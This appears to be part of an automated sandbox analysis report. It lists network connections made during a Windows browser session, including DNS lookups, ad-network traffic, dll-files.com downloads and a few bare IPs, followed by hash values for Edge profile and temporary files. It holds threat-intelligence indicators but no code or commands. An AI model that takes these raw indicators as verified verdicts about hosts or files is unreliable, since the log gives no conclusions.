| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| IE | 23.216.155.139:443 | th.bing.com | udp |
| IE | 23.216.155.170:443 | r.bing.com | udp |
| IE | 23.216.155.139:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 8.8.8.8:53 | rewards.bing.com | udp |
| US | 150.171.27.10:443 | rewards.bing.com | tcp |
| RU | 109.248.203.81:21 | tcp | |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.74:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| GB | 79.127.237.132:443 | www.dll-files.com | tcp |
| GB | 79.127.237.132:443 | www.dll-files.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| GB | 142.250.179.234:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 104.18.10.207:443 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.178.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.169.46:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 172.217.169.34:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.24:443 | measurement-api.criteo.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | tcp |
| NL | 178.250.1.39:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 142.250.180.1:443 | ep2.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 216.58.204.66:443 | ep1.adtrafficquality.google | udp |
| FR | 51.77.7.204:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| GB | 172.217.169.42:443 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 216.58.213.2:443 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | rtb.fr3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | csm.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | client-side-metrics.eu.criteo.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| NL | 178.250.1.54:443 | client-side-metrics.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| IE | 31.13.73.35:443 | www.facebook.com | udp |
| IE | 31.13.73.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| GB | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| US | 8.8.8.8:53 | ads.eu.criteo.com | udp |
| FR | 178.250.7.12:443 | rtb.fr3.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | cat.nl3.eu.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| US | 8.8.8.8:53 | measurement-api.criteo.com | udp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 178.250.1.24:443 | measurement-api.criteo.com | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | download.zip.dll-files.com | udp |
| FR | 143.244.56.58:443 | download.zip.dll-files.com | tcp |
| FR | 143.244.56.58:443 | download.zip.dll-files.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| IT | 2.18.255.68:443 | www.bing.com | udp |
| IT | 2.18.255.68:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| IT | 2.18.255.93:443 | r.bing.com | udp |
| IT | 2.18.255.93:443 | r.bing.com | udp |
| IT | 2.18.255.115:443 | th.bing.com | udp |
| IT | 2.18.255.115:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| CA | 69.50.175.178:80 | tcp | |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| CA | 69.50.175.178:80 | tcp | |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6eac9d05429a9358b608d44d94784e10 |
| SHA1 | 73395ed98fee0a7a2f8585c37a8811bd8837585d |
| SHA256 | 0bf0ae5a65a11d2714b2ac12a424cd38ed0a8b7e7530ec59362786b1a832eb60 |
| SHA512 | 235731c2c6a85f6ada201f4e4c061ce7db201a2e82c04334a5bfcbfdba60f9ac1b99a06e9ac1e9bbea1651b16747fa4e44f68f6882a960671b6b613f51213c18 |
\??\pipe\crashpad_4936_KJZHPWNWOOTLXDJW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a7bd3d5922ae81414e7944b805a7d35a |
| SHA1 | e46d09db68c10c1fa46f3e38f65ab8263bcebc5c |
| SHA256 | bf1e815460636c7eedf53bcf4ce784779c762d894954dc17c5fd6cec76a13695 |
| SHA512 | d14a13dddf68d10b0f593ae574e8e80c53e62ca6cf873c730ae34c87a434c1caa74bfa0ce8789ab050beabfa80d323c5dad416cc28c7fb169f9e664f1c2ce030 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cf1d30ca2332aa18881b260bba9417f1 |
| SHA1 | a8dc7686399154740a107526f533f6ecdb071137 |
| SHA256 | 5fb81b7f6083c821a5f8e1e3ff9783dd3d808bb5a7edcac8ad94441a6c101824 |
| SHA512 | c6c07d6593dd645640165a5e76b7662d5af298f9a3781c44950b9bf330cb4f58d0939624625148c3bd90e13acf563f6c55091e27ed7f55ffe31545f2ca1b3d9b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3913928d36a204b8c7a09f9664615308 |
| SHA1 | 6f5a2afcf7d4f9ba5d201c4575ee7ea5cbc904bc |
| SHA256 | 5cd63a20006de4c006a47a6b3a922a53b15bda4fbfd14e77b8a5416583c8f9b9 |
| SHA512 | 25f2410c171fb2c64bd4a3706a3a3b5de6f694cbebe555cc223996fd3a16d346737594d4cc09a737484d8a5e3a0ea33e0705ac60481b51857bdb3127a7996145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 9909f25844a1ac13b891bf462008cc5a |
| SHA1 | 62a89cf9811ec7836d31ae1cfcadeea40d449262 |
| SHA256 | 30f323427ba600b0f21e8688973f0521d909ae20004238a4b37a8af67892af88 |
| SHA512 | abb2b081701327aef555d5ece7d883473bb604ac92e6d94986f26d12a348a35ff9c2d06de93aa746b6f7ed3fa6ced66366882c73172315c2e7503cd82c40d782 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | a025da0ebcf89247ff9b629cf9102d84 |
| SHA1 | 6edb404e1e926439e927c76de4797fa4e39100b3 |
| SHA256 | 6a987bcb93b542e404cdb5996a911a818e3ac3c9fcd9fa5e0903a16f137bc21e |
| SHA512 | 9880b122b449fcf43609991ba8bfe0c1acb271a654d20ebb9e59ed96e11efd89ae034acd939c49e0fbb798a41195282e56f5cc1e6387362de0deb863f242499a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4936_847988428\6eeca731-58f6-454b-b9a0-9b69c3cd474f.tmp
| MD5 | cc05ed3e66468e692745ba6563c69740 |
| SHA1 | eae9dbd4d36aa91fd43f7d452ac3d252b103759d |
| SHA256 | fb1311fb7142825abacb3c7aedddf948f5c9b258e447c953ce0f7f4b19c6dfff |
| SHA512 | 4b527db02d6ea36b914558a3e44fd3d15772bf2be4ba0a640bf70427af07dcde5ed6967930cc3624a244cfc82290f125eea2754812586216b3d5a37757ce8db4 |
C:\Users\Admin\AppData\Local\Temp\090c6243-2cb7-4625-badf-088de9eebab7.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\76624c06-9455-46b1-831c-65bc5339ed29.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist
| MD5 | d11d7533c72bb4f2e791d05650a45e2e |
| SHA1 | eb1383e1d99a1c78ce2721fee15043eb7d498f63 |
| SHA256 | 3d7124bd67434b44501704e52f34ba05d545541b01335cf5fbbcefde11703ba5 |
| SHA512 | 52188a97e95b96b4ae1c219baead33cd56b84ebc82131fbb7312c379d4d847944491f42e17def5a22351796c1f4eadcbe66455162207c888eb93e7fdb1b46d71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js
| MD5 | 3d20584f7f6c8eac79e17cca4207fb79 |
| SHA1 | 3c16dcc27ae52431c8cdd92fbaab0341524d3092 |
| SHA256 | 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643 |
| SHA512 | 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5e635cdb0e61c5e4c7203669f195a68 |
| SHA1 | 04eb8119bae584e6802f3d269f17000b86ed4f19 |
| SHA256 | 11ccb733e7f7238fd2d95c4e15f8c409923975fa18e24cd37aa4428b7830fbe4 |
| SHA512 | 534d14b0354566128f5ce1c16a2168975273ccea36420fe4816b7ae9b48d13e1852995aed68b2e534430079f69fa1098c864727c6801067213c2e07b7f342453 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 65e997c55db45b534d70d9024d14def1 |
| SHA1 | 0962b3269c79e1d2e647cfac3e11f195f233ce38 |
| SHA256 | 9d65e4ad5d0b08bc3ddd38588e0e16565b94938f3c8584391f2464dffdfa9f0f |
| SHA512 | 38bf81e0bab3a25f4a7eb01d309e6691ae9a0df507c633dc94305103d369733bfc1546abee7a0d3324104c96e9e86cd954d230b5aa97c61844422e013ac410f6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 84614b13d358af20a58da2b2e90b671e |
| SHA1 | b3ccb056457d2c2bf7639372dbcecd5e5b9f29e0 |
| SHA256 | 72e1fe9dc4e6990cfd9636823254eba771fcaa03d35a1c53d20c9427cf5bece1 |
| SHA512 | b8b29b202bf68e8b1a1b97d2e7c11497eeaa46401998eb9fb09f074a2b144234ea9d4f9692c8d1abe09cde06b71c475cdf88ac5e7858d69955d5508f9bd79d49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index~RFe578c13.TMP
| MD5 | acc0238398e33ea10f4ba5cc651860b9 |
| SHA1 | 1cbdcd9511c38d8e1b4ba5972a71d6ed15ab749e |
| SHA256 | 1a40b8594e30215b08ba2f1b597130f1a7f405b36977bdea732609e127c94416 |
| SHA512 | dd6836e8b76494027f20d02c5ddc2135c86eca379fa0fd0c939cd4dfc8736c51fc5031628b2cdab7fb673cd210391a5c3d36a304635ab6be597422ba41401686 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\863b841d-5c10-44d3-99ed-2b9af6f19ec0\index-dir\the-real-index
| MD5 | bf3bba0d5b278b7276367a6acd394ce6 |
| SHA1 | 74ce01e356fc234decf50b358cf1a8c5b7ae6865 |
| SHA256 | b94292449f57a5d2250e3d9b11748bdb946a6b89847a5a2daa392667babe57ec |
| SHA512 | 47b9d67b907d574e7aa982a9500a15ddd6cd934e087543fe15f0b58a6e6b1bca201fd8edd3774954c5bce4915395de356d72fd38c4698dc7bf1f8c4d2648cef4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | aa09337019e09f44c09d1951e82f26d8 |
| SHA1 | 38bd6301adfe6e248d3570a43e78be875b0493ca |
| SHA256 | 222dc494fa24b738863ab79c9db5a9901c721ab802c9a88ea45c59fc0c2b8468 |
| SHA512 | 148f614ebdb9cb4a307e7dd2ae445ae44414b078e027f10faf37900d1787b5ca652de2559f5985ccb0609aff66cb22ca6182fb9dddc0e1b6934a353e35d1d034 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe57d4e4.TMP
| MD5 | ea05c6b44fbc6cef0216798e455c60a2 |
| SHA1 | 9ef3efbd93cb53f324c31a76563f7c0e1abeb747 |
| SHA256 | f5ba5e1582687fc1da53257a2be9ecda811061bffe5d41e02233e118bc43ac47 |
| SHA512 | 0a96cde7e8ba6434c54c9ce20771beb2173422c29cc440d11fb6c3a907793a9d147dbcc3ff9a240c2adfcf87355c3d96f012576f5bd8c301702cdfa88142a844 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7ae766bc26dd294f838e6edb5b5c9e36 |
| SHA1 | de0fd07fa49709c762129db80b80d0cd449d3971 |
